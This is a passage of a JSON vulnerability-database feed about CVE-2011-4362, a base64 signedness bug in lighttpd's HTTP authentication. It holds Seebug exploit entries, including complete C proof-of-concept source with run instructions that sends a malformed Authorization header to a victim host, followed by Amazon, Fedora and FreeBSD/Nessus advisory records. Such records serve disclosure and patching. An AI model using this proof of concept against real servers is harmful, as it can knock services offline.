ch"\u4f5c\u4e3a\u6620\u5c04\u8868\u7684\u7d22\u5f15\uff0c\u5927\u4e8e0x80\u7684\u5b57\u7b26\u5c31\u4f1a\u5bfc\u81f4\u8d1f\u7d22\u5f15\uff0c\u53ef\u80fd\u9020\u6210\u975e\u6cd5\u5185\u5b58\u8bbf\u95ee\u3002\r\n\r\nlighttpd <=1.4.29\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLightTPD\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.lighttpd.net/", "published": "2011-12-01T00:00:00", "title": "lighttpd mod_auth\u6a21\u5757base64 \u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-24275", "id": "SSV:24275", "sourceData": "\n ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n---\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-24275"}, {"lastseen": "2017-11-19T17:56:15", "description": "No description provided by source.", "published": "2011-12-27T00:00:00", "type": "seebug", "title": "Lighttpd 1.4.30 / 1.5 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26120", "id": "SSV:26120", "sourceData": "\n /*\r\n *Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit.\r\n * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang\r\n *\r\n * Here the vulnerable code (src/http_auth.c:67)\r\n *\r\n * --- CUT ---\r\n * static const short base64_reverse_table[256] = {\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F\r\n * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F\r\n * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F\r\n * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F\r\n * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F\r\n * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF\r\n * };\r\n *\r\n * static unsigned char * base64_decode(buffer *out, const char *in) {\r\n * ...\r\n * int ch, ...;\r\n * size_t i;\r\n * ...\r\n * \r\n * ch = in[i];\r\n * ...\r\n * ch = base64_reverse_table[ch];\r\n * ...\r\n * }\r\n * --- CUT ---\r\n *\r\n * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\n * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault\r\n * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata\r\n * section before the base64_reverse_table table cause this situation.\r\n *\r\n * I have added some extra debug in the lighttpd source code to see if this vulnerability is\r\n * executed correctly. Here is output for one of the example:\r\n *\r\n * --- CUT ---\r\n * ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * 127(. | 0 | 0)\r\n * -128(t | 1 | 0)\r\n * -127(e | 2 | 1)\r\n * -126(' | 3 | 2)\r\n * -125(e | 4 | 3)\r\n * -124(u | 5 | 3)\r\n * -123(r | 6 | 4)\r\n * -122(' | 7 | 5)\r\n * -121(s | 8 | 6)\r\n * -120(c | 9 | 6)\r\n * -119(i | 10 | 7)\r\n * -118(n | 11 | 8)\r\n * -117(i | 12 | 9)\r\n * -116( | 13 | 9)\r\n * -115(a | 14 | 10)\r\n * -114(t | 15 | 11)\r\n * -113(. | 16 | 12)\r\n * -112(e | 17 | 12)\r\n * -111(u | 18 | 13)\r\n * -110(r | 19 | 14)\r\n * -109(' | 20 | 15)\r\n * -108(f | 21 | 15)\r\n * -107(i | 22 | 16)\r\n * -106(e | 23 | 17)\r\n * -105(: | 24 | 18)\r\n * -104(= | 25 | 18)\r\n * -103(o | 26 | 19)\r\n * -102(t | 27 | 20)\r\n * -101(o | 28 | 21)\r\n * -100( | 29 | 21)\r\n * -99(a | 30 | 22)\r\n * -98(g | 31 | 23)\r\n * -97(. | 32 | 24)\r\n * -96(d | 33 | 24)\r\n * -95(g | 34 | 25)\r\n * -94(s | 35 | 26)\r\n * -93(: | 36 | 27)\r\n * -92(u | 37 | 27)\r\n * -91(s | 38 | 28)\r\n * -90(p | 39 | 29)\r\n * -89(o | 40 | 30)\r\n * -88(t | 41 | 30)\r\n * -87(d | 42 | 31)\r\n * -86(b | 43 | 32)\r\n * -85(c | 44 | 33)\r\n * -84(e | 45 | 33)\r\n * -83(d | 46 | 34)\r\n * -82(( | 47 | 35)\r\n * -81(n | 48 | 36)\r\n * -80(y | 49 | 36)\r\n * -79(h | 50 | 37)\r\n * -78(d | 51 | 38)\r\n * -77(g | 52 | 39)\r\n * -76(s | 53 | 39)\r\n * -75( | 54 | 40)\r\n * -74(r | 55 | 41)\r\n * -73(p | 56 | 42)\r\n * -72(a | 57 | 42)\r\n * -71(n | 58 | 43)\r\n * -70(. | 59 | 44)\r\n * -69(. | 60 | 45)\r\n * -68(d | 61 | 45)\r\n * -67(g | 62 | 46)\r\n * -66(s | 63 | 47)\r\n * -65(: | 64 | 48)\r\n * -64(( | 65 | 48)\r\n * -63(d | 66 | 49)\r\n * -62(- | 67 | 50)\r\n * -61(e | 68 | 51)\r\n * -60(s | 69 | 51)\r\n * -59( | 70 | 52)\r\n * -58(i | 71 | 53)\r\n * -57(s | 72 | 54)\r\n * -56(n | 73 | 54)\r\n * -55( | 74 | 55)\r\n * -54(i | 75 | 56)\r\n * -53(l | 76 | 57)\r\n * -52(. | 77 | 57)\r\n * -51(. | 78 | 58)\r\n * -50(k | 79 | 59)\r\n * -49(0 | 80 | 60)\r\n * -48(% | 81 | 60)\r\n * -47(] | 82 | 61)\r\n * -46(p | 83 | 62)\r\n * -45(r | 84 | 63)\r\n * -44(0 | 85 | 63)\r\n * -43(% | 86 | 64)\r\n * -42(] | 87 | 65)\r\n * -41(s | 88 | 66)\r\n * -40(z | 89 | 66)\r\n * -39([ | 90 | 67)\r\n * -38(x | 91 | 68)\r\n * -37(x | 92 | 69)\r\n * -36( | 93 | 69)\r\n * -35(s | 94 | 70)\r\n * -34(d | 95 | 71)\r\n * -33(0 | 96 | 72)\r\n * -32(% | 97 | 72)\r\n * -31(] | 98 | 73)\r\n * -30(. | 99 | 74)\r\n * -29(. | 100 | 75)\r\n * -28(d | 101 | 75)\r\n * -27(c | 102 | 76)\r\n * -26(d | 103 | 77)\r\n * -25(i | 104 | 78)\r\n * -24(g | 105 | 78)\r\n * -23(b | 106 | 79)\r\n * -22(s | 107 | 80)\r\n * -21(6 | 108 | 81)\r\n * -20(- | 109 | 81)\r\n * -19(t | 110 | 82)\r\n * -18(i | 111 | 83)\r\n * -17(g | 112 | 84)\r\n * -16(f | 113 | 84)\r\n * -15(i | 114 | 85)\r\n * -14(e | 115 | 86)\r\n * -13(. | 116 | 87)\r\n * -12(. | 117 | 87)\r\n * -11(. | 118 | 88)\r\n * -10(. | 119 | 89)\r\n * -9(. | 120 | 90)\r\n * -8(. | 121 | 90)\r\n * -7(. | 122 | 91)\r\n * -6(. | 123 | 92)\r\n * -5(. | 124 | 93)\r\n * -4(. | 125 | 93)\r\n * -3(. | 126 | 94)\r\n * -2(. | 127 | 95)\r\n * -1(. | 128 | 96)\r\n * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * ptr[0x9a92c48] size[0xc0] used[0x60]\r\n * string [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n * --- CUT ---\r\n *\r\n * First column is the offset so vulnerability is executed like it should be\r\n * (negative offsets). Second column is byte which is read out-of-bound.\r\n *\r\n *\r\n * Maybe you can find vulnerable binary?\r\n *\r\n *\r\n * Best regards,\r\n * Adam 'pi3' Zabrocki\r\n *\r\n *\r\n * --\r\n * http://pi3.com.pl\r\n * http://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\n * http://blog.pi3.com.pl/?p=277\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <getopt.h>\r\n\r\n#define PORT 80\r\n#define SA struct sockaddr\r\n\r\nchar header[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\nchar header_port[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s:%d\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n int i=PORT,opt=0,sockfd;\r\n char *remote_dir = NULL;\r\n char *r_hostname = NULL;\r\n struct sockaddr_in servaddr;\r\n struct hostent *h = NULL;\r\n char *buf;\r\n unsigned int len = 0x0;\r\n\r\n\r\n if (!argv[1])\r\n usage(argv[0]);\r\n\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\t\\t[+] Preparing arguments... ");\r\n while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {\r\n switch(opt) {\r\n\r\n case 'h':\r\n\r\n r_hostname = strdup(optarg);\r\n if ( (h = gethostbyname(r_hostname))==NULL) {\r\n printf("Gethostbyname() field!\\n");\r\n exit(-1);\r\n }\r\n break;\r\n\r\n case 'p':\r\n\r\n i=atoi(optarg);\r\n break;\r\n\r\n case 'd':\r\n\r\n remote_dir = strdup(optarg);\r\n break;\r\n\r\n case '?':\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n default:\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n }\r\n }\r\n\r\n if (!remote_dir || !h) {\r\n usage(argv[0]);\r\n exit(-1);\r\n }\r\n\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_port = htons(i);\r\n servaddr.sin_addr = *(struct in_addr*)h->h_addr;\r\n\r\n len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;\r\n if ( (buf = (char *)malloc(len)) == NULL) {\r\n printf("malloc() :(\\n");\r\n exit(-1);\r\n }\r\n memset(buf,0x0,len);\r\n\r\n if (i != 80)\r\n snprintf(buf,len,header_port,remote_dir,r_hostname,i);\r\n else\r\n snprintf(buf,len,header,remote_dir,r_hostname);\r\n\r\n for (i=0;i<130;i++)\r\n buf[strlen(buf)] = 127+i;\r\n\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n\r\n printf("OK\\n\\t\\t[+] Creating socket... ");\r\n if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {\r\n printf("Socket() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Connecting to [%s]... ",r_hostname);\r\n if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {\r\n printf("Connect() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Sending dirty packet... ");\r\n// write(1,buf,strlen(buf));\r\n write(sockfd,buf,strlen(buf));\r\n\r\n printf("OK\\n\\n\\t\\t[+] Check the website!\\n\\n");\r\n\r\n close(sockfd);\r\n\r\n}\r\n\r\nint usage(char *arg) {\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\tUsage: %s <options>\\n\\n\\t\\tOptions:\\n",arg);\r\n printf("\\t\\t\\t -v <victim>\\n\\t\\t\\t -p <port>\\n\\t\\t\\t -d <remote_dir_for_auth>\\n\\n");\r\n exit(0);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26120", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:25:09", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "type": "seebug", "title": "lighttpd Denial of Service Vulnerability PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72453", "id": "SSV:72453", "sourceData": "\n 29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\t...\r\n\tint ch, ...;\r\n\tsize_t i;\r\n\t...\r\n\r\n\t\tch = in[i];\r\n\t\t...\r\n\t\tch = base64_reverse_table[ch];\r\n\t...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\tUsage: ./p_cve-2011-4362 <options>\r\n\r\n\t\tOptions:\r\n\t\t\t -v <victim>\r\n\t\t\t -p <port>\r\n\t\t\t -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\t\t[+] Preparing arguments... OK\r\n\t\t[+] Creating socket... OK\r\n\t\t[+] Connecting to [127.0.0.1]... OK\r\n\t\t[+] Sending dirty packet... OK\r\n\r\n\t\t[+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n?Yg\\???n?Xt?]rze???gY??\\??Yb?Y(?d??r?[Y???-?xi??i?k?Wp?\t]???\\???@V??x???ize\r\n\r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72453", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:42", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4362"], "description": "**Issue Overview:**\n\nInteger signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.\n\n \n**Affected Packages:** \n\n\nlighttpd\n\n \n**Issue Correction:** \nRun _yum update lighttpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n lighttpd-fastcgi-1.4.31-1.2.amzn1.i686 \n lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.i686 \n lighttpd-debuginfo-1.4.31-1.2.amzn1.i686 \n lighttpd-mod_geoip-1.4.31-1.2.amzn1.i686 \n lighttpd-1.4.31-1.2.amzn1.i686 \n \n src: \n lighttpd-1.4.31-1.2.amzn1.src \n \n x86_64: \n lighttpd-fastcgi-1.4.31-1.2.amzn1.x86_64 \n lighttpd-debuginfo-1.4.31-1.2.amzn1.x86_64 \n lighttpd-1.4.31-1.2.amzn1.x86_64 \n lighttpd-mod_geoip-1.4.31-1.2.amzn1.x86_64 \n lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-07-09T14:20:00", "published": "2012-07-09T14:20:00", "id": "ALAS-2012-107", "href": "https://alas.aws.amazon.com/ALAS-2012-107.html", "title": "Medium: lighttpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4362"], "description": "Secure, fast, compliant and very flexible web-server which has been optimiz ed for high-performance environments. It has a very low memory footprint compa red to other webservers and takes care of cpu-load. Its advanced feature-set (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make it the perfect webserver-software for every server that is suffering load problems. ", "modified": "2012-06-26T00:31:28", "published": "2012-06-26T00:31:28", "id": "FEDORA:7030920B10", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: lighttpd-1.4.31-1.fc16", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4362"], "description": "Secure, fast, compliant and very flexible web-server which has been optimiz ed for high-performance environments. It has a very low memory footprint compa red to other webservers and takes care of cpu-load. Its advanced feature-set (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make it the perfect webserver-software for every server that is suffering load problems. ", "modified": "2012-06-26T00:44:26", "published": "2012-06-26T00:44:26", "id": "FEDORA:B2BF02022D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: lighttpd-1.4.31-1.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-07T10:49:51", "description": "US-CERT/NIST reports :\n\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.", "edition": 24, "published": "2011-12-29T00:00:00", "title": "FreeBSD : lighttpd -- remote DoS in HTTP authentication (c6521b04-314b-11e1-9cf4-5404a67eef98)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-29T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:lighttpd"], "id": "FREEBSD_PKG_C6521B04314B11E19CF45404A67EEF98.NASL", "href": "https://www.tenable.com/plugins/nessus/57411", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57411);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"FreeBSD : lighttpd -- remote DoS in HTTP authentication (c6521b04-314b-11e1-9cf4-5404a67eef98)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"US-CERT/NIST reports :\n\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\"\n );\n # 